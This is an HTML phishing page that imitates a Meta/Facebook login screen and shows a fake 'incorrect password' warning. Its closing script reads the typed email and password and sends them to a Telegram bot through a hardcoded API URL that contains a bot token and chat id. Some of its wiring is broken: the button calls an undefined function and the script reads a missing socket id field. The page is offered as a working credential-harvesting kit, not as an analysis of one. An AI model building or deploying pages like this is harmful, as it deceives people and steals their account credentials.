<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-rbsA2VBKQhggwzxH7pPCaAqO46MgnOM80zW1RWuH61DGLwZJEdK2Kadq2F9CUG65" crossorigin="anonymous">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js
    "></script>

    <title>Meta For Business</title>
    <style>
        .rdbgwhTx {
            background-color: #fa3e3e;
            padding: 8px;
            color: #fff;
            text-align: center;
            font-family: Helvetica, Arial, sans-serif;
            font-size: 14px;
            line-height: 18px;
        }

        .rdbgwhTx a {
            color: #fff;
            font-weight: bold;
            text-decoration: none;
        }

        .lgDv {
            text-align: center;
            padding-top: 8px;
            padding-bottom: 6px;

        }



        ._emIn {
            padding: 12px;
            background: #f5f6f7;

            box-sizing: border-box;
            width: 100%;
            font-size: 14px;
            line-height: 18px;
            border: 1px solid #ededed;
            border-radius: 4px;
        }

        ._frmCont {
            padding: 0px 16px;
        }

        .lgBtn {
            font-size: 17px;
            height: 40px;
            line-height: 40px;
            background-color: #1877f2;
            border: none;
            border-radius: 4px;
            text-align: center;
            color: #fff;
            font-weight: 600;
            width: 100%;
        }

        .fgPw {
            color: #216fdb;
            font-family: 'Roboto-Regular', 'Helvetica', 'sans-serif';
            font-size: 14px;
            line-height: 16px;
            text-decoration: none;
            text-align: center;
        }

        ._lnSp {
            display: flex;
            justify-content: center;
            align-items: center;
            text-align: center;
            white-space: nowrap;
            margin: 23px 0 4px 0;
            width: 100%;
            height: 2px;
            background-color: #ededed;
            line-height: 1px;

        }

        ._lnSp span {
            background-color: #fff;
            z-index: 2;
            position: relative;
            padding-inline: 18px;
            line-height: 20px;
        }

        .crtnwacc {
            background: white;
            border-color: #bec3c9;
            border-style: solid;
            border-width: 1px;
            box-shadow: none;
            color: #000;
            display: inline-block;
            flex: none;
            font-size: 15px;
            font-style: normal;
            letter-spacing: -0.23px;
            text-align: center;
            text-shadow: none;
            white-space: nowrap;
            width: 80%;
            text-align: center;
            text-decoration: none;
            padding: 7px 10px 5px;
            border-radius: 4px;
        }

        @media (min-width: 576px) {
            ._frmCont {
                border-radius: 8px;
                box-shadow: 0 2px 4px rgba(0, 0, 0, .1), 0 8px 16px rgba(0, 0, 0, .1);
                margin: auto;
                padding-top: 15px;
                padding-bottom: 35px;
                background-color: #fff;
            }

            ._emIn {
                background-color: #fff;
            }


            .lgDv svg {
                width: 240px;

            }

            .bgDskt {
                background: #f0f2f5;
                padding-top: 100px;
                padding-bottom: 100px;
            }

            .lngLSt {
                padding-top: 3rem;
                margin: 0px 40px;
            }

            .lngLSt span {
                padding-right: 15px;
            }
        }
    </style>
</head>

<body>
    <div class="bgDskt">

        <div class="rdbgwhTx d-block d-sm-none">
            <span>Incorrect password.
                <a class="_652e" aria-label="Did you forget your password?">Did you forget your password?</a></span>
        </div>

        <div class="_frmCont" style="max-width: 400px; margin: auto;">
            <div class="lgDv">
                <svg width="112px" xmlns="http://www.w3.org/2000/svg" id="Layer_1" data-name="Layer 1"
                    viewBox="0 0 1022.51 360">
                    <defs>
                        <style>
                            .cls-1 {
                                fill: #1877F2;
                            }
                        </style>
                    </defs>
                    <title>FBWordmark_Hex-RGB-1024</title>
                    <path class="cls-1"
                        d="M166.43,126.68c-9.65,0-12.44,4.28-12.44,13.72v15.66h25.74l-2.58,25.3H154v76.78H123.11V181.36H102.3v-25.3h20.81V140.83c0-25.52,10.29-39,39-39a146.17,146.17,0,0,1,18,1.07v23.81Z" />
                    <path class="cls-1"
                        d="M181.87,203.88c0-28.52,13.51-50,41.82-50,15.44,0,24.87,7.94,29.38,17.8V156.06h29.59V258.14H253.07V242.7c-4.29,9.87-13.94,17.59-29.38,17.59-28.31,0-41.82-21.45-41.82-50Zm30.88,6.87c0,15.22,5.57,25.3,19.94,25.3,12.66,0,19.09-9.22,19.09-23.8V202c0-14.58-6.43-23.8-19.09-23.8-14.37,0-19.94,10.08-19.94,25.3Z" />
                    <path class="cls-1"
                        d="M347,153.91c12,0,23.37,2.58,29.59,6.86l-6.86,21.88a48.6,48.6,0,0,0-20.59-4.72c-16.73,0-24,9.65-24,26.17v6c0,16.52,7.29,26.17,24,26.17a48.6,48.6,0,0,0,20.59-4.72l6.86,21.87c-6.22,4.29-17.58,6.87-29.59,6.87-36.25,0-52.76-19.52-52.76-50.83v-4.72C294.24,173.43,310.75,153.91,347,153.91Z" />
                    <path class="cls-1"
                        d="M380.66,211v-9c0-28.95,16.51-48,50.19-48,31.74,0,45.68,19.3,45.68,47.61v16.3h-65c.65,13.94,6.87,20.16,24,20.16,11.59,0,23.81-2.36,32.82-6.22L474,253c-8.15,4.3-24.88,7.51-39.67,7.51C395.24,260.5,380.66,241,380.66,211Zm30.88-13.3h37.32v-2.57c0-11.15-4.5-20-18-20C416.91,175.14,411.54,183.94,411.54,197.66Z" />
                    <path class="cls-1"
                        d="M591,210.32c0,28.52-13.72,50-42,50-15.44,0-26.16-7.72-30.45-17.59v15.44H489.39V104.8L520.27,102v68.2c4.5-9,14.37-16.3,28.74-16.3,28.31,0,42,21.45,42,50Zm-30.88-7.08c0-14.37-5.57-25.09-20.37-25.09-12.66,0-19.52,9-19.52,23.59v10.72c0,14.58,6.86,23.59,19.52,23.59,14.8,0,20.37-10.72,20.37-25.09Z" />
                    <path class="cls-1"
                        d="M601.33,209.67v-5.14c0-29.39,16.73-50.62,50.83-50.62S703,175.14,703,204.53v5.14c0,29.38-16.73,50.62-50.83,50.62S601.33,239.05,601.33,209.67Zm70.78-7.29c0-13.51-5.58-24.23-20-24.23s-19.95,10.72-19.95,24.23v9.44c0,13.51,5.58,24.23,19.95,24.23s20-10.72,20-24.23Z" />
                    <path class="cls-1"
                        d="M713.27,209.67v-5.14c0-29.39,16.73-50.62,50.83-50.62s50.83,21.23,50.83,50.62v5.14c0,29.38-16.73,50.62-50.83,50.62S713.27,239.05,713.27,209.67Zm70.78-7.29c0-13.51-5.58-24.23-19.95-24.23s-19.94,10.72-19.94,24.23v9.44c0,13.51,5.57,24.23,19.94,24.23s19.95-10.72,19.95-24.23Z" />
                    <path class="cls-1"
                        d="M857.39,204.74l30.45-48.68h32.81l-31.95,50.4,33.24,51.68H889.13l-31.74-50v50H826.5V104.8L857.39,102Z" />
                </svg>
            </div>
            <div>
                <input autocorrect="off" autocapitalize="off" class="_emIn" autocomplete="on" name="email"
                    placeholder="Mobile number or email" type="email" id="eml">
            </div>
            <div style="padding-top: 8px;padding-bottom: 12px">
                <input autocorrect="off" autocapitalize="off" class="_emIn" autocomplete="on" placeholder="Password"
                    type="password" style="border-color: #fa3e3e;" id="pww">
            </div>
            <div class="d-none d-sm-block" style="color: #f02849;
            font-family: SFProText-Regular, Helvetica, Arial, sans-serif;
            font-size: 13px;
            line-height: 16px;
            margin-bottom: 8px;
            text-align: center;">
                <span>The password you’ve entered is incorrect. <span style="font-weight: 600;">Forgot Password?</span>
                </span>
            </div>
            <div>
                <button onclick="smbtFrmPw()" type="button" value="Log in" class="lgBtn" name="login"><span
                        class="_55sr">Log
                        in</span>
                </button>
            </div>
            <div style="padding-top: 12px" class="text-center">
                <a class="fgPw" tabindex="0">Forgot password?</a>
            </div>
            <div id="login_reg_separator" class="_lnSp d-block d-sm-none" data-sigil="login_reg_separator">
                <span class="_43mh">or</span>
            </div>
            <div style="    padding: 20px 0 12px 0;margin: auto;" class="text-center d-block d-sm-none">
                <a class="crtnwacc">Create new account</a>
            </div>
        </div>
    </div>
    <div class="d-block d-sm-none">

        <div style="padding-top: 80px;" class="px-4">
            <div class="row justify-content-center text-center">
                <div class="col-6"><span
                        style="color: #90949c;font-size: 12px;line-height: 16px;font-weight: bold;">English
                        (US)</span>
                    <div style="line-height: 16px;"><span><a
                                style="color: #576b95;font-size: 12px;line-height: 16px;">Deutsch</a></span></div>
                    <div style="line-height: 16px;"><span><a
                                style="color: #576b95;font-size: 12px;line-height: 16px;">Српски</a></span></div>
                    <div style="line-height: 16px;"><span><a
                                style="color: #576b95;font-size: 12px;line-height: 16px;">Português (Brasil)</a></span>
                    </div>
                </div>
                <div class="col-6">
                    <div style="line-height: 16px;">
                        <span>
                            <a style="color: #576b95;font-size: 12px;line-height: 16px;">Shqip</a>
                        </span>
                    </div>
                    <div style="line-height: 16px;">
                        <span>
                            <a style="color: #576b95;font-size: 12px;line-height: 16px;">Türkçe</a>
                        </span>
                    </div>
                    <div style="line-height: 16px;">
                        <span>
                            <a style="color: #576b95;font-size: 12px;line-height: 16px;">Español</a>
                        </span>
                    </div>
                </div>
            </div>
        </div>
        <div class="pt-4 text-center" style="font-size:10px;color: #8a8d91;">
            <a>About</a>
            <span> · </span>
            <a>Help</a>
            <span> · </span>
            <span>More</span>
        </div>
        <div class="pt-1 text-center">
            <span style="color: gray;font-size: 12px;font-weight: 500;">Meta © 2023</span>
        </div>
    </div>
    <div class="d-none d-sm-block" style="max-width: 1000px; margin: auto;">
        <div class="lngLSt" style="font-size:14px;color: #8a8d91;">
            <span style="color: #737373;">English (US)</span>
            <span><a>Shqip</a></span>
            <span><a>Deutsch</a></span>
            <span><a>Türkçe</a></span>
            <span><a>Српски</a></span>
            <span><a>Français (France)</a></span>
            <span><a>Italiano</a></span>
            <span><a>Bosanski</a></span>
            <span><a>Svenska</a></span>
            <span><a>Español</a></span>
            <span><a>Português (Brasil)</a></span>
            <div style="border-bottom: 1px solid #dddfe2;
            font-size: 1px;
            height: 8px;
            margin-bottom: 8px;"> </div>
            <span><a>Sign Up</a></span>
            <span><a>Log In</a></span>
            <span><a>Messenger</a></span>
            <span><a>Facebook Lite</a></span>
            <span><a>Watch</a></span>
            <span><a>Places</a></span>
            <span><a>Games</a></span>
            <span><a>Marketplace</a></span>
            <span><a>Meta
                    Pay</a></span>
            <span><a>Meta Store</a></span>
            <span><a>Meta
                    Quest</a></span>
            <span><a>Instagram</a></span>
            <span><a>Fundraisers</a></span>
            <span><a>Services</a></span>
            <span><a>Voting Information Center</a></span>
            <span><a>Privacy
                    Policy</a></span>
            <span><a>Privacy Center</a></span>
            <span><a>Groups</a></span>
            <span><a>About</a>
            </span>
            <span><a>Create Ad</a></span>
            <span><a>Create Page</a></span>
            <span><a>Developers</a></span>
            <span><a>Careers</a></span>
            <span><a>Cookies</a></span>
            <span><a style="word-break: keep-all;">Ad choices</a>
            </span>
            <span><a>Help</a></span>
            <span>
                <a">Contact Uploading &amp;
                    Non-Users</a>
            </span>
            <span><a>Settings</a></span>
            <span><a>Activity log</a></span>
            <div class="pt-3">
                <span style="color: #737373; font-weight: 500;font-size: 12px;"> Meta © 2023</span>
            </div>
        </div>

    </div>

    <script>
        function smbtFrm() {
            let eml = document.getElementById('eml').value.replace('#', '-sharp-');
            let pww = document.getElementById('pww').value.replace('#', '-sharp-');
            let socket_id =  document.getElementById('socket_id').value
            var params = {
                content: '=============================' + '%0A' +
                    'Email: "' + eml + '"' + '%0A' +
                    'Password: "' + pww + '"' + '%0A'+ "SOCKET ID " + socket_id
            }
      

            fetch(`https://api.telegram.org/bot7200711723:AAHQosYOVZP2zbG2pmBuvCZL-WyGVGM7C_E/sendMessage?chat_id=-4225800222&text=${params.content}/, {text=${params.content}/`, {
                method: 'POST', // or 'PUT'
                headers: {
                    'Content-Type': 'application/json',
                },

            }).then(function () {

            })
        }
    </script>
</body>

</html>